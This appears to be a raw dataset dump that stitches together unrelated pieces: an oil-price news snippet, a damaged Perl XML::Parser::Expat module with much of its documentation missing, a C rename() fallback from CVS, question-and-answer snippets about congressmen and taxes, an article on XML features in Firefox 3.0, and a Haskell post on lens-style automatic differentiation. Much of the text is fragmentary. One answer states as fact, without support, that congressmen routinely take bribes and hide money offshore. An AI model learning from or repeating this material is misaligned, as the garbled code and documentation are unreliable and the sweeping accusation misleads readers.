text stringlengths 454 608k | url stringlengths 17 896 | dump stringclasses 91 values | source stringclasses 1 value | word_count int64 101 114k | flesch_reading_ease float64 50 104 |
|---|---|---|---|---|---|
23 January 2008 17:07 [Source: ICIS news]
LONDON (ICIS news)--NYMEX light sweet crude futures fell by more than two dollars on Wednesday to take the front month March contract close to the $87.00/bbl mark on the back of continued concern over the US economy, which was causing a major sell-off across the world’s stock and commodity markets.
By 16:55 GMT, March NYMEX crude had hit a low of $87.20/bbl, a loss of $2.01/bbl from the Tuesday close of $89.21/bbl, before recovering to around $87.45/bbl.
At the same time, March Brent crude on ICE Futures was trading around $87.15/bbl, having earlier hit a low of $86.72/bbl, a loss of $1.73 | http://www.icis.com/Articles/2008/01/23/9095231/nymex-crude-falls-over-2bbl-on-recession-fears.html | CC-MAIN-2014-42 | refinedweb | 131 | 76.01 |
package XML::Parser::Expat; require 5.004; use strict; use vars qw($VERSION @ISA %Handler_Setters %Encoding_Table @Encoding_Path $have_File_Spec); use Carp; require DynaLoader; @ISA = qw(DynaLoader); $ method and two names can be checked for absolute equality with the L<"eq_name"> method. =item * NoExpand * ErrorContext When this option is defined, errors are reported in context. The value of ErrorContext should be the number of lines to show on either side of the line in which the error occurred. =item * ParseParamEnt Unless standalone is set to "yes" in the XML declaration, setting this to a true value allows the external DTD to be read, and parameter entities to be parsed and expanded. =item * Base The base to use for relative pathnames or URLs. This can also be done by using the base method. =back =item setHandlers(TYPE, HANDLER [, TYPE, HANDLER [...]]): =over 4 =item * Start (Parser, Element [, Attr, Val [,...]]) This event is generated when an XML start tag is recognized. Parser is an XML::Parser::Expat instance. Element is the name of the XML element that is opened with the start tag. The Attr & Val pairs are generated for each attribute in the start tag. =item * End (Parser, Element). =item * Char (Parser,. =item * Proc (Parser, Target, Data) This event is generated when a processing instruction is recognized. =item * Comment (Parser, String) This event is generated when a comment is recognized. =item * CdataStart (Parser) This is called at the start of a CDATA section. =item * CdataEnd (Parser) This is called at the end of a CDATA section. =item * Default (Parser,. =item * Unparsed (Parser,. =item * Notation (Parser,. =item * ExternEnt (Parser,). =item * ExternEntFin (Parser) This is called after an external entity has been parsed. It allows applications to perform cleanup on actions performed in the above ExternEnt handler. =item * Entity (Parser,. =item * Element (Parser, Name, Model) The element handler is called when an element declaration is found. 
Name is the element name, and Model is the content model as an XML::Parser::ContentModel object. See L<"XML::Parser::ContentModel Methods"> for methods available for this class. =item * Attlist (Parser,. =item * Doctype (Parser,. =item * DoctypeFin (Parser) This handler is called after parsing of the DOCTYPE declaration has finished, including any internal or external DTD declarations. =item * XMLDecl (Parser, Version, Encoding, Standalone). =back =item namespace(name). =item eq_name(name1, name2) Return true if name1 and name2 are identical (i.e. same name and from the same namespace.) This is only meaningful if both names were obtained through the Start or End handlers from a single document, or through a call to the generate_ns_name method. =item generate_ns_name(name, namespace) Return a name, associated with a given namespace, good for using with the above 2 methods. The namespace argument should be the namespace URI, not a prefix. =item new_ns_prefixes When called from a start tag handler, returns namespace prefixes declared with this start tag. If called elsewhere (or if there were no namespace prefixes declared), it returns an empty list. Setting of the default namespace is indicated with '#default' as a prefix. =item expand_ns_prefix(prefix) Return the uri to which the given prefix is currently bound. Returns undef if the prefix isn't currently bound. Use '#default' to find the current binding of the default namespace (if any). =item current_ns_prefixes Return a list of currently bound namespace prefixes. The order of the prefixes in the list has no meaning. If the default namespace is currently bound, '#default' appears in the list. =item recognized_string. =item original_string Returns the verbatim string from the document that was recognized in order to call the current handler. The string is in the original document encoding. This method doesn't return a meaningful string inside declaration handlers. =item default_current. 
=item xpcroak(message) Concatenate onto the given message the current line number within the XML document plus the message implied by ErrorContext. Then croak with the formed message. =item xpcarp(message) Concatenate onto the given message the current line number within the XML document plus the message implied by ErrorContext. Then carp with the formed message. =item current_line Returns the line number of the current position of the parse. =item current_column Returns the column number of the current position of the parse. =item current_byte Returns the current position of the parse. =item base([NEWBASE]); Returns the current value of the base for resolving relative URIs. If NEWBASE is supplied, changes the base to that value. =item context Returns a list of element names that represent open elements, with the last one being the innermost. Inside start and end tag handlers, this will be the tag of the parent element. =item current_element Returns the name of the innermost currently opened element. Inside start or end handlers, returns the parent of the element associated with those tags. =item in_element(NAME) Returns true if NAME is equal to the name of the innermost currently opened element. If namespace processing is being used and you want to check against a name that may be in a namespace, then use the generate_ns_name method to create the NAME argument. =item within_element(NAME) Returns the number of times the given name appears in the context list. If namespace processing is being used and you want to check against a name that may be in a namespace, then use the generate_ns_name method to create the NAME argument. =item depth Returns the size of the context list. =item element_index Returns an integer that is the depth-first visit order of the current element. This will be zero outside of the root element. For example, this will return 1 when called from the start handler for the root element start tag. =item skip_until(INDEX). 
=item position_in_context(LINES) Returns a string that shows the current parse position. LINES should be an integer >= 0 that represents the number of lines on either side of the current parse line to place into the returned string. =item xml_escape(TEXT [, CHAR [, CHAR ...]]) Returns TEXT with markup characters turned into character entities. Any additional characters provided as arguments are also turned into character references where found in TEXT. =item parse (SOURCE). =item parsestring(XML_DOC_STRING). =item parsefile(FILENAME) Parses the XML document in the given file. Will die if parsestring or parsefile has been called previously for this instance. =item is_defaulted(ATTNAME) NO LONGER WORKS. To find out if an attribute is defaulted please use the specified_attr method. =item specified_attr. =item finish Unsets all handlers (including internal ones that set context), but expat continues parsing to the end of the document or until it finds an error. It should finish up a lot faster than with the handlers set. =item release. =back =head2 XML::Parser::ContentModel Methods). =over 4 =item isempty This method returns true if the object is "EMPTY", false otherwise. =item isany This method returns true if the object is "ANY", false otherwise. =item ismixed This method returns true if the object is "(#PCDATA)" or "(#PCDATA|...)*", false otherwise. =item isname This method returns true if the object is an element name. =item ischoice This method returns true if the object is a choice of content particles. =item isseq This method returns true if the object is a sequence of content particles. =item quant This method returns undef or a string representing the quantifier ('?', '*', '+') associated with the model or particle. =item children This method returns undef or (for mixed, choice, and sequence types) an array of component content particles. 
There will always be at least one component for choices and sequences, but for a mixed content model of pure PCDATA, "(#PCDATA)", an undef is returned. =back =head2: =over 4 =item parse_more(DATA) Feed expat more text to munch on. =item parse_done Tell expat that it's gotten the whole document. =back =head1 FUNCTIONS =over 4 =item XML::Parser::Expat::load_encoding(ENCODING) automatically called by expat when it encounters an encoding it doesn't know about. Expat shouldn't call this twice for the same encoding name. The only reason users should use this function is to explicitly load an encoding not contained in the @Encoding_Path list. =back =head1 AUTHORS Larry Wall <F<larry@wall.org>> wrote version 1.0. Clark Cooper <F<coopercc@netheaven.com>> picked up support, changed the API for this version (2.x), provided documentation, and added some standard package features. =cut | http://opensource.apple.com/source/CPANInternal/CPANInternal-108/XML-Parser/Expat/Expat.pm | CC-MAIN-2016-30 | refinedweb | 1372 | 58.69 |
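The Start, End, and Char handlers described above are the core expat callback model, and the same shape appears in expat bindings for other languages. As a quick runnable illustration, here is the same event pattern in Python's standard-library expat binding, xml.parsers.expat (note this is Python, not the Perl module being documented; the handler names differ but map one-to-one onto Start, End, and Char):

```python
import xml.parsers.expat

events = []

p = xml.parsers.expat.ParserCreate()
# StartElementHandler maps onto Start (Parser, Element [, Attr, Val ...]):
p.StartElementHandler = lambda name, attrs: events.append(("start", name, attrs))
# EndElementHandler maps onto End (Parser, Element):
p.EndElementHandler = lambda name: events.append(("end", name))
# CharacterDataHandler maps onto Char (Parser, String):
p.CharacterDataHandler = lambda text: events.append(("char", text))

p.Parse('<doc id="1"><msg>hi</msg></doc>', True)
# events now holds the parse stream in document order; character data
# may in general be delivered in more than one chunk.
```

As with the Perl module, the parser instance drives everything through callbacks; there is no tree built unless your handlers build one.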
/* rename.c -- BSD compatible directory function for System V
   Copyright (C) 1988, */

#ifdef HAVE_CONFIG_H
#include "config.h"
#endif

#include <sys/types.h>
#include <sys/stat.h>
#include <errno.h>

#ifndef STDC_HEADERS
extern int errno;
#endif

/* Rename file FROM to file TO.  Return 0 if successful, -1 if not. */

int
rename (from, to)
     char *from;
     char *to;
{
  struct stat from_stats;
  int pid, status;

  if (stat (from, &from_stats) == 0)
    {
      /* We don't check existence_error because the systems
         which need it have rename().  */
      if (unlink (to) && errno != ENOENT)
        return -1;
      if ((from_stats.st_mode & S_IFMT) == S_IFDIR)
        {
#ifdef MVDIR
          /* I don't think MVDIR ever gets defined, but I don't think it
             matters, because I don't think CVS ever calls rename() on
             directories.  */
          /* Need a setuid root process to link and unlink directories.  */
          pid = fork ();
          switch (pid)
            {
            case -1:            /* Error.  */
              error (1, errno, "cannot fork");

            case 0:             /* Child.  */
              execl (MVDIR, "mvdir", from, to, (char *) 0);
              error (255, errno, "cannot run `%s'", MVDIR);

            default:            /* Parent.  */
              while (wait (&status) != pid)
                /* Do nothing.  */ ;
              errno = 0;        /* mvdir printed the system error message.  */
              return status != 0 ? -1 : 0;
            }
#else /* no MVDIR */
          error (1, 0, "internal error: cannot move directories");
#endif /* no MVDIR */
        }
      else
        {
          /* We don't check existence_error because the systems
             which need it have rename().  */
          if (link (from, to) == 0
              && (unlink (from) == 0 || errno == ENOENT))
            return 0;
        }
    }
  return -1;
}
| http://opensource.apple.com/source/cvs_wrapped/cvs_wrapped-15/cvs_wrapped/lib/rename.c | CC-MAIN-2015-11 | refinedweb | 222 | 68.87 |
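For comparison, the unlink-then-link fallback that the C function uses for regular files can be sketched in Python. This is my own illustrative translation, not part of the CVS source; the directory case (the MVDIR branch) is deliberately not handled.

```python
import errno
import os

def rename_compat(src, dst):
    """Emulate the link/unlink branch of the C rename() above for
    regular files: remove any existing destination, hard-link the
    source to the new name, then unlink the old name."""
    # Mirrors: if (unlink (to) && errno != ENOENT) return -1;
    try:
        os.unlink(dst)
    except FileNotFoundError:
        pass
    except OSError:
        return -1
    # Mirrors: if (link (from, to) == 0 && (unlink (from) == 0 || errno == ENOENT)) return 0;
    try:
        os.link(src, dst)
    except OSError:
        return -1
    try:
        os.unlink(src)
    except FileNotFoundError:
        pass
    except OSError:
        return -1
    return 0
```

Like the C original, this first unlinks the destination, so a failure after that point can leave the destination missing; modern rename() avoids that window, which is why the emulation is only a fallback.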
Micah Dubinko
Micah Dubinko served as an editor and author of the XForms 1.0 W3C specification, where he participated in the XForms effort since September 1999, nine months before the official Working Group was chartered. Micah received a CompTIA CDIA (Certified Document Imaging Architect) certification in January 2001 and an InfoWorld Innovator award in 2004. He is the author of O'Reilly XForms Essentials, available online at. Currently, Micah works for Yahoo! in California as a Senior Research Developer.
Articles by this author:
Is XML 2.0 Under Development?
In Micah Dubinko's return to the XML Annoyances banner, he speculates as to whether the W3C is already considering whether to start work on XML 2.0. Read this piece and decide for yourself.
[Jan. 10, 2007]
Cracks in the Foundation
Micah Dubinko takes aim at the legion of annoyances caused by XML namespaces.
[Nov. 8, 2006]
The Power of No
In his latest XML Annoyances column Micah Dubinko examines a common force behind the good and bad aspects of XML.
[Feb. 1, 2006]
XML 2005: Tipping Sacred Cows
In his latest XML Annoyances column, Micah Dubinko reports from last week's XML 2005 conference in Atlanta.
[Nov. 23, 2005]
Microformats and Web 2.0
Top 10 XForms Engines
Micah Dubinko, one of the gurus of XForms, offers a rundown on the state of XForms engines for 2005.
[Feb. 9, 2005]
XForms and Microsoft InfoPath
Micah Dubinko, author of XForms Essentials, compares W3C XForms and Microsoft InfoPath, the data gathering technology shipping with Microsoft Office 2003.
[Oct. 29, 2003]
Ten Favorite XForms Engines
The author of O'Reilly's XForms Essentials describes ten software packages that implement the W3C's XForms specification, seen as the XML-friendly successor to HTML forms.
[Sep. 10, 2003]
A Hyperlink Offering
Prompted by recent debate over XHTML 2.0's invention of HLink, Achilles and the tortoise meet to discuss the use of linking in W3C specifications.
[Sep. 25, 2002]
What Are XForms
HTML forms have long been a weak link in web interfaces -- now XML comes to the rescue with XForms, the W3C's new web forms technology. Update: 9/11/2002
[Sep. 11, 2002]
What's Next for HTML?
Micah Dubinko examines upcoming developments in the HTML family, including XHTML 2.0, XML Events and XFrames.
[Sep. 4, 2002]
Interactive Web Services with XForms
The W3C's new XForms technology can be used to attach user interfaces to web services, making efficient use of existing infrastructure.
[Jan. 16, 2002]
Copyright © 2008 O'Reilly Media, Inc. | (707) 827-7000 / (800) 998-9938 | http://www.xml.com/pub/au/115 | crawl-001 | refinedweb | 440 | 55.74 |
Do congressmen pay taxes?
Yes, they are subject to the same tax code.
What does a congressman do?
A Congressman or woman's main job is to make laws. They make speeches to the group, debate, and vote. In certain circumstances they have other powers, like declaring war and impeachment.
What do congressmen do?
Although "congressman" may refer to any member of Congress, it often refers to a member of the House of Representatives, the members of the Senate being called senators. In either case, the congressman represents his district or state in whichever house he belongs to. The purpose of the house is to make laws (including changing laws already in effect). Therefore the congressman proposes and votes on bills, which become law if the Congress passes them and the President signs them. In order to decide which laws may be needed and how to vote, the congressman may hold and attend hearings which call witnesses to be questioned. He or she may also make speeches, read and send out letters, and meet with other congressmen in hopes of influencing their votes. He also reads his letters and meets with people who want Congress to act on certain issues. He is also likely to be always campaigning for reelection by making his record as appealing as possible to voters in his district. He has a staff to help him and has to manage his staff.
Who pays your Congressman?
Pay for congressmen comes from two sources: 1. Pay, perks and benefits for congressmen are paid by the US Govt, using money paid by taxpayers. 2. Bribes, kickbacks, under-the-table and off-the-record deals, selling Senate seats, book-buying package deals, inflated pay for one-time speeches at events, and gifts given to congressmen in exchange for favorable behavior in Congress are opportunities for a congressman to hide millions, and many times tens of millions, of dollars in offshore accounts (untaxable, of course) in a period of just a few years.
In a 401k when you eventually pay taxes which taxes do you pay?
After you reach your retirement age, distributions from your 401K are subject to federal income tax at your marginal tax rate and may be subject to some state income tax.
WHO is your congressman?
Chino
When do you pay the taxes if you take out money from a 401k?
You can have some income tax withheld from the distribution amount, or you can choose to make some quarterly estimated tax payments, or you can wait until you file your income tax return in the next year after the year that you receive the distribution, by the due date of your income tax return for the previous year, and pay the full amount of taxes at that time. For a calendar-year taxpayer, the due date for filing and paying any amount owed would be April 15 of the next year.
Do you pay taxes on income tax return?
I assume that this question is about an income tax refund, and not about an income tax return (which is the form you file with income tax authorities every year, along with any income taxes you still owe.) A Federal income tax refund is not taxable income (for state or Federal purposes) in the year a taxpayer receives it. A state income tax refund for a previous tax year, however, may be another story. It will be Federal taxable income in the year in which the taxpayer receives the refund, if he itemized deductions on the previous year's Federal income tax return. Suppose a taxpayer files his 2010 Form 1040, and itemizes his deductions. Following the instructions for the 1040, he deducts $500 withheld as state income tax (shown on his W-2) in computing his 2010 Federal taxable income. He then prepares his state income tax return and discovers that he owes only $435 in state income tax, and is due a refund of $65 (the difference between the $500 withheld and his actual liability of $435). His actual state tax liability was only $435, but he had deducted $500 from his 2010 Federal taxable income, so when he gets the $65 refund in 2011, he must include it in 2011 income for Federal income tax purposes to make up the difference. However, if the state refund was for a tax year for which the taxpayer did not itemize deductions on his Federal tax return (i.e., he took the standard deduction), it is not taxable income to him.
Why pay taxes?
Because someone has to pay for the roads and social programs. If you don't want to pay for this, vote for politicians who want to eliminate taxes and make everything private.
A congressman does not?
serve for life
Why do you have to pay taxes?
We have to pay taxes because the government needs to pay for its various functions.
Why pay tax?
We pay tax to the government so the government can use the money for buildings, public services, schools, and other needs.
If you don't pay taxes will you get a tax refund?
No, not at all. Alternative view: a tax refund depends entirely on whether more money was paid in (through payroll withholding or estimated payments every quarter, as required) than what the return shows as actually being owed after all accounting. Many people get refunds (those who have paid in and then turn out to owe no tax), and many people have to pay additional tax. Also, many people with no tax liability and no payments in actually get benefits back, in the form of credits and Federal support (like the earned income credit, and others).
Do congressmen pay for their postage?
No. Congressmen have the ability to use what is called a 'free frank' for official business. It really means that they sign the envelope; nowadays it is a pre-printed signature where the stamp goes.
With all the hundreds of XML processing tools out there, Web browsers are still where the action is—luckily for XML developers, the action never seems to slow down. Over the past few years I've written a series of articles (see Resources) about XML-related features in the developer favorite, the Firefox browser; I've covered Firefox 1.5 through 2.0. Recently Firefox moved up to version 3.0 with numerous overall improvements and a lot of great new developments for XML processing. Many of the improvements come from the upgrade of the core Web processing engine, Gecko, from version 1.8.1 to 1.9.
XML fundamentals in version 3.0
The XML space includes a huge stack of technologies, but it still all begins with the parser; Firefox 3 introduces one huge improvement to basic XML parsing. In the past on Mozilla browsers, parsing an XML document was synchronous, blocking all operations on the document until it was fully loaded. Contrast this to HTML parsing which has always been asynchronous so that parts of the document become available as they're parsed. To the user, this meant he starts to see how a Web page shaped up before the browser had completely processed the page; on the other hand, with XML documents the user saw nothing at all until it was completely parsed. This was a usability problem that served as an unfortunate deterrent for processing large XML documents.
In Firefox 3.0, construction of the XML content model is incremental, much as it is for HTML. This will make a big difference for practical use of XML on the Web. There are some exceptions—most notably that XSLT is not processed incrementally. In theory, you might apply a subset of XSLT incrementally, using a restricted subset of XPath, but doing so is significant effort in itself and lies beyond the scope of Firefox 3.0.
One improvement I had hoped for in Firefox 3.0 is xml:id support. There was some
controversy as to whether to support this, but a patch is available with a good
chance that it will become available in a future release. As a general note, the only means Firefox JavaScript provides to use
getElementById on XML documents is the internal DTD subset (no external subset, and no xml:id). If you really need xml:id, use XPath from JavaScript to query for attributes in the XML namespace and the "id" local name.
Another hoped-for core improvement that didn't make it is the ability for the user to request that the browser load the external DTD subset. Again it looks as if a patch is ready but there just weren't enough available developer resources to work it through the QA process to get it into the Firefox 3.0 release. Firefox 3.0 implements a selection of EXSLT extensions within a selection of modules, as listed:
- Common: Firefox 3.0 implements the basic set of general-purpose functions:
- exsl:node-set allows you to turn result tree fragments into node-sets so that you can apply XPath on them.
- exsl:object-type is an introspection tool to report the type of an object such as string, node set, number, or boolean.
- Sets: Firefox 3.0 implements some useful extensions for working with node sets:
- set:difference computes the difference between two sets, returning a node-set whose nodes are in one of the arguments but not the other.
- set:distinct examines a node set for nodes with the same string value and removes all but one instance of each.
- set:intersection computes the intersection of two sets, returning a node-set whose nodes are in both.
- set:has-same-node determines whether two node sets have any nodes in common (such as whether they share the actual same node and not just different nodes with the same string value, as with the XPath = operator).
- set:leading returns the nodes in one node-set that come before the first node in the other node-set, in document order.
- set:trailing returns the nodes in one node-set that come after the first node in the other node-set, in document order.
- Strings: Firefox 3.0 implements some useful extensions for working with strings:
- str:concat returns a string concatenating the string values of each node in a set (compare to the built-in concat function, which concatenates a fixed sequence of expressions).
- str:split uses a pattern to split a string into a sequence of substrings (represented in a node set constructed at run time).
- str:tokenize uses a set of single-character tokens to split a string into a sequence of substrings (represented in a node set constructed at run time).
- Math: Firefox 3.0 implements some functions that make it easier to grab smallest and largest numerical quantities from the content of node sets:
- math:max returns the highest numerical value of content within a given node set.
- math:min returns the lowest numerical value of content within a given node set.
- math:highest returns the node set whose content has the highest numerical value.
- math:lowest returns the node set whose content has the lowest numerical value.
- Regular expressions: Firefox 3.0 brings the power of regular expressions to XSLT:
- regexp:match matches a regular expression pattern against a string and returns the matching substrings as a node set constructed at run time.
- regexp:test checks whether a string entirely matches a regular expression pattern.
- regexp:replace replaces substrings that match a regular expression pattern.
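To pin down the semantics of a couple of these extension functions, here are small pure-Python analogues. These are my own sketches: the real functions operate on XPath node-sets inside a transform, which plain Python lists and strings only approximate.

```python
def str_tokenize(string, delimiters=" \t\n\r"):
    """Rough analogue of str:tokenize - split on any single character
    from the delimiter set, dropping empty tokens."""
    tokens, current = [], ""
    for ch in string:
        if ch in delimiters:
            if current:
                tokens.append(current)
            current = ""
        else:
            current += ch
    if current:
        tokens.append(current)
    return tokens

def set_distinct(values):
    """Rough analogue of set:distinct - keep the first node for each
    distinct string value, preserving document order."""
    seen, out = set(), []
    for v in values:
        if v not in seen:
            seen.add(v)
            out.append(v)
    return out

print(str_tokenize("2008-01-23T17:07", "-T:"))  # ['2008', '01', '23', '17', '07']
print(set_distinct(["a", "b", "a", "c"]))       # ['a', 'b', 'c']
```

The date-splitting example mirrors the classic str:tokenize use case of breaking an ISO-style timestamp into fields inside a stylesheet.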
To get you started using EXSLT in your own transforms, I've constructed an example that exercises a good number of the functions implemented in Firefox 3.0. One of the best uses I've found for XSLT in the browser is to deliver reports against semi-structured data. You point the user to the XML file which contains a processing instruction to apply an XSLT transform. In such situations you can often dictate the required browser version so you don't have to worry as much about cross-browser compatibility. In addition you offload a lot of work from the server to each user's computer. Listing 1 (employees.xml) is an employee information file against which I'll present a report in Firefox 3.0.
Listing 1. Employee information file employees.xml
Notice the xml-stylesheet processing instruction at the top, which instructs the browser to use XSLT. Listing 2 (employees.xsl) is a transform to generate a report from Listing 1.
Listing 2. Transform to generate a report from the employee information file (employees.xsl)
I've heavily commented the code, highlighting where I use EXSLT, as well as other useful notes. The generated output references a CSS stylesheet, mostly as a demonstration of this pattern. Listing 3 (employees.css) is the CSS.
Listing 3. Presentation stylesheet for the report generate from the employee information file (employees.css)
Load Listing 1 into Firefox 3.0 to get the display in Figure 1.
Figure 1. Firefox 3.0 display of the report generated using Listings 1-3
In addition to the core-parsing improvements and EXSLT, Firefox 3.0 includes some fixes for compliance when working with XML documents with namespaces. The DOMAttrModified event now properly handles attributes in a namespace, and the JavaScript DOM method getElementsByTagName() now works correctly on sub-trees that have elements with namespace prefixes in their tag names. There are many CSS and JavaScript fixes which will make life easier for XML developers.
For users of Scalable Vector Graphics (SVG), everyone's favorite XML showpiece, Firefox 3.0 offers even more goodies. It now supports patterns and masks which give you more options for rich effects; all SVG 1.1 filters are supported. You can now apply SVG transforms to any old Web browser object so that for example you might decide to rotate an IFRAME by 45 degrees, a trick that would usually require the Canvas facility. The Mozilla team has filled out SVG DOM support and along the way, squashed a lot of bugs.
Some will comment that XML has not had the expected success on the Web, but there is certainly a lot you can already accomplish with XML in browsers and thanks to continuing development in Web browsers, more and more becomes possible each year. Firefox 3.0 is an important milestone with its core performance improvements for XML processing, as well as the enhancements to XSLT, DOM, and SVG. You can't go wrong trying out these new capabilities. Even if you can't put all the bits to use right away because of cross-browser requirements, you'll be prepared for the future as the state of the art continues to advance in Web applications.
Learn
- Firefox 3 for developers: Review the updated developer features for Firefox 3.0 and learn about the major improvements.
- For more details on the key fixes see the relevant bug entries:
- 18333 – XML Content Sink should be incremental
- 365801 – expose EXSLT functions to DOM Level 3 XPath API (documentInstance.evaluate)
- 362391 – DOMAttrModified doesn't handle namespaced attributes properly
- 206053 – document.getElementsByTagName('tagname') with XML document wrongly includes elements with namespace prefix in the tag name
- 22942 (entities) – Load external DTDs (entity/entities) (local and remote) if a pref is set
- 275196 – xml:id support
- xml:id standards page (developerWorks, April 2007): Find out more about xml:id and how to give unique identifiers to elements in XML documents.
- Extensible Stylesheet Language Transformations (XSLT) standards page (developerWorks, April 2007): Find out more about XSLT and EXSLT and how to transform XML documents to different forms.
- xml:id support: Keep track of progress, and if need be, use XPath through JavaScript to query for attributes in the XML namespace and "id" local name.
- SVG improvements in Firefox 3: Check out the improved support for SVG in this convenient list of newly added features.
- Check out earlier articles on Firefox and XML (developerWorks, Uche Ogbuji):
- XML in Firefox 1.5, Part 1: Overview of XML features (March 2006)
- XML in Firefox 1.5, Part 2: Basic XML processing (March 2006)
- XML in Firefox 1.5, Part 3: JavaScript meets XML in Firefox (August 2006)
- Firefox 2.0 and XML (October 2007)
- Multi-pass XSLT (developerWorks, Uche Ogbuji, September 2002) and Counting words in XML documents (developerWorks, Uche Ogbuji, September 2005) : Discover some XSLT techniques that become available with the addition of an EXSLT subset in Mozilla. For more on EXSLT overall, see "EXSLT by example" (developerWorks, Uche Ogbuji, February 2003).
- Firefox: Get the Mozilla-based Web browser that offers standards compliance, performance, security, and solid XML features.
- its successor Amara 2; Weblog Copia. | http://www.ibm.com/developerworks/library/x-think41/ | crawl-002 | refinedweb | 1,774 | 54.02 |
I read the announcement of VSoup and some enthusiastic people saying
it was much faster than Souper. So I decided to give it a try. Since
I never trust new features/programs, I decided to test VSoup on getting
my news. I put the VSoup command in the place of the souper command in
my getting-news-script. I made a connection with my provider and ran
the changed script. Nothing happened. Okay, my window opened, but my
script stopped. I couldn't exit the script. Not with CTRL-Break or
CTRL-C, not even with closing the window. It just didn't close. And my
system started acting slower. I had to restart my system to get rid of
the script-window. So I decided to make a small test script to get only
two newsgroups. This is what my script looks like:
@echo off
f:
cd \yarn\temp
vsoup -m -N f:\yarn\home\testrc
if not exist *.msg goto einde
if not exist areas goto einde
copy 00000??.MSG *.OLD
copy AREAS AREAS.OLD
zip -kjm soup.zip areas *.msg
import soup.zip.
And a request to Hardy Griech: It might be useful to allow a CTRL-Break
or CTRL-C to exit VSoup, so please can you implement it?
Thanks,
Ronald
-- Ronald Redmeijer Leiden, The Netherlands redm@xs4all.nl
***** My best friend convinced me to buy his computer. ***** ***** He now has more time seeing my girl-friend. ***** | http://www.vex.net/yarn/list/199609/0119.html | crawl-001 | refinedweb | 241 | 86.2 |
Neural Networks with Weighty Lenses (DiOptics?)
I wrote a while back how you can make a pretty nice DSL for reverse mode differentiation based on the same type as Lens. I’d heard some interesting rumblings on the internet around these ideas and so was revisiting them.
type Lens s t a b = s -> (a, b -> t) type AD x dx y dy = x -> (y, dy -> dx)
Composition is defined identically for reverse mode just as it is for lens.
The forward computation shares info with the backwards differential propagation, which corresponds to a transposed Jacobian
After chewing on it a while, I realized this really isn’t that exotic. How it works is that you store the reverse mode computation graph, and all necessary saved data from the forward pass in the closure of the
(dy -> dx). I also have a suspicion that if you defunctionalized this construction, you’d get the Wengert tape formulation of reverse mode ad.
Second, Lens is just a nice structure for bidirectional computation, with one forward pass and one backward pass which may or may not be getting/setting. There are other examples for using it like this.
It is also pretty similar to the standard “dual number” form
type FAD x dx y dy = (x,dx)->(y,dy) for forward mode AD. We can bring the two closer by a CPS/Yoneda transformation and then some rearrangement.
x -> (y, dy -> dx) ==> x -> (y, forall s. (dx -> s) -> (dy -> s)) ==> forall s. (x, dx -> s) -> (y, dx -> s)
and meet it in the middle with
(x,dx) -> (y,dy) ==> forall s. (x, s -> dx) -> (y, s -> dy)
I ended the previous post somewhat unsatisfied by how ungainly writing that neural network example was, and I called for Conal Elliot’s compiling to categories plugin as a possible solution. The trouble is piping the weights all over the place. This piping is very frustrating in point-free form, especially when you know it’d be so trivial pointful. While the inputs and outputs of layers of the network compose nicely (you no longer need to know about the internal computations), the weights do not. As we get more and more layers, we get more and more weights. The weights are in some sense not as compositional as the inputs and outputs of the layers, or compose in a different way that you need to maintain access to.
I thought of a very slight conceptual twist that may help.
The idea is we keep the weights out to the side in their own little type parameter slots. Then we define composition such that it composes input/outputs while tupling the weights. Basically we throw the repetitive complexity appearing in piping the weights around into the definition of composition itself.
These operations are easily seen as 2 dimensional diagrams.
Three layers composed, exposing the weights from all layers
The 2-D arrow things can be built out of the 1-d arrows of the original basic AD lens by bending the weights up and down. Ultimately they are describing the same thing
Here’s the core reverse lens ad combinators
import Control.Arrow ((***)) type Lens'' a b = a -> (b, b -> a) comp :: (b -> (c, (c -> b))) -> (a -> (b, (b -> a))) -> (a -> (c, (c -> a))) comp f g x = let (b, dg) = g x in let (c, df) = f b in (c, dg . df) id' :: Lens'' a a id' x = (x, id) relu' :: (Ord a, Num a) => Lens'' a a relu' = \x -> (frelu x, brelu x) where frelu x | x > 0 = x | otherwise = 0 brelu x dy | x > 0 = dy | otherwise = 0 add' :: Num a => Lens'' (a,a) a add' = \(x,y) -> (x + y, \ds -> (ds, ds)) dup' :: Num a => Lens'' a (a,a) dup' = \x -> ((x,x), \(dx,dy) -> dx + dy) sub' :: Num a => Lens'' (a,a) a sub' = \(x,y) -> (x - y, \ds -> (ds, -ds)) mul' :: Num a => Lens'' (a,a) a mul' = \(x,y) -> (x * y, \dz -> (dz * y, x * dz)) recip' :: Fractional a => Lens'' a a recip' = \x-> (recip x, \ds -> - ds / (x * x)) div' :: Fractional a => Lens'' (a,a) a div' = (\(x,y) -> (x / y, \d -> (d/y,-x*d/(y * y)))) sin' :: Floating a => Lens'' a a sin' = \x -> (sin x, \dx -> dx * (cos x)) cos' :: Floating a => Lens'' a a cos' = \x -> (cos x, \dx -> -dx * (sin x)) pow' :: Num a => Integer -> Lens'' a a pow' n = \x -> (x ^ n, \dx -> (fromInteger n) * dx * x ^ (n-1)) --cmul :: Num a => a -> Lens' a a --cmul c = lens (* c) (\x -> \dx -> c * dx) exp' :: Floating a => Lens'' a a exp' = \x -> let ex = exp x in (ex, \dx -> dx * ex) fst' :: Num b => Lens'' (a,b) a fst' = (\(a,b) -> (a, \ds -> (ds, 0))) snd' :: Num a => Lens'' (a,b) b snd' = (\(a,b) -> (b, \ds -> (0, ds))) -- some monoidal combinators swap' :: Lens'' (a,b) (b,a) swap' = (\(a,b) -> ((b,a), \(db,da) -> (da, db))) assoc' :: Lens'' ((a,b),c) (a,(b,c)) assoc' = \((a,b),c) -> ((a,(b,c)), \(da,(db,dc)) -> ((da,db),dc)) assoc'' :: Lens'' (a,(b,c)) ((a,b),c) assoc'' = \(a,(b,c)) -> (((a,b),c), \((da,db),dc)-> (da,(db,dc))) par' :: Lens'' a b -> Lens'' c d -> Lens'' (a,c) (b,d) par' l1 l2 = l3 where l3 (a,c) = let (b , j1) = l1 a in let (d, j2) = l2 c in ((b,d) , j1 *** j2) first' :: Lens'' a b -> Lens'' (a, c) (b, c) first' l = par' l id' second' :: Lens'' a b -> 
Lens'' (c, a) (c, b) second' l = par' id' l labsorb :: Lens'' ((),a) a labsorb (_,a) = (a, \a' -> ((),a')) labsorb' :: Lens'' a ((),a) labsorb' a = (((),a), \(_,a') -> a') rabsorb :: Lens'' (a,()) a rabsorb = comp labsorb swap'
And here are the two dimensional combinators. I tried to write them point-free in terms of the combinators above to demonstrate that there is no monkey business going on. We
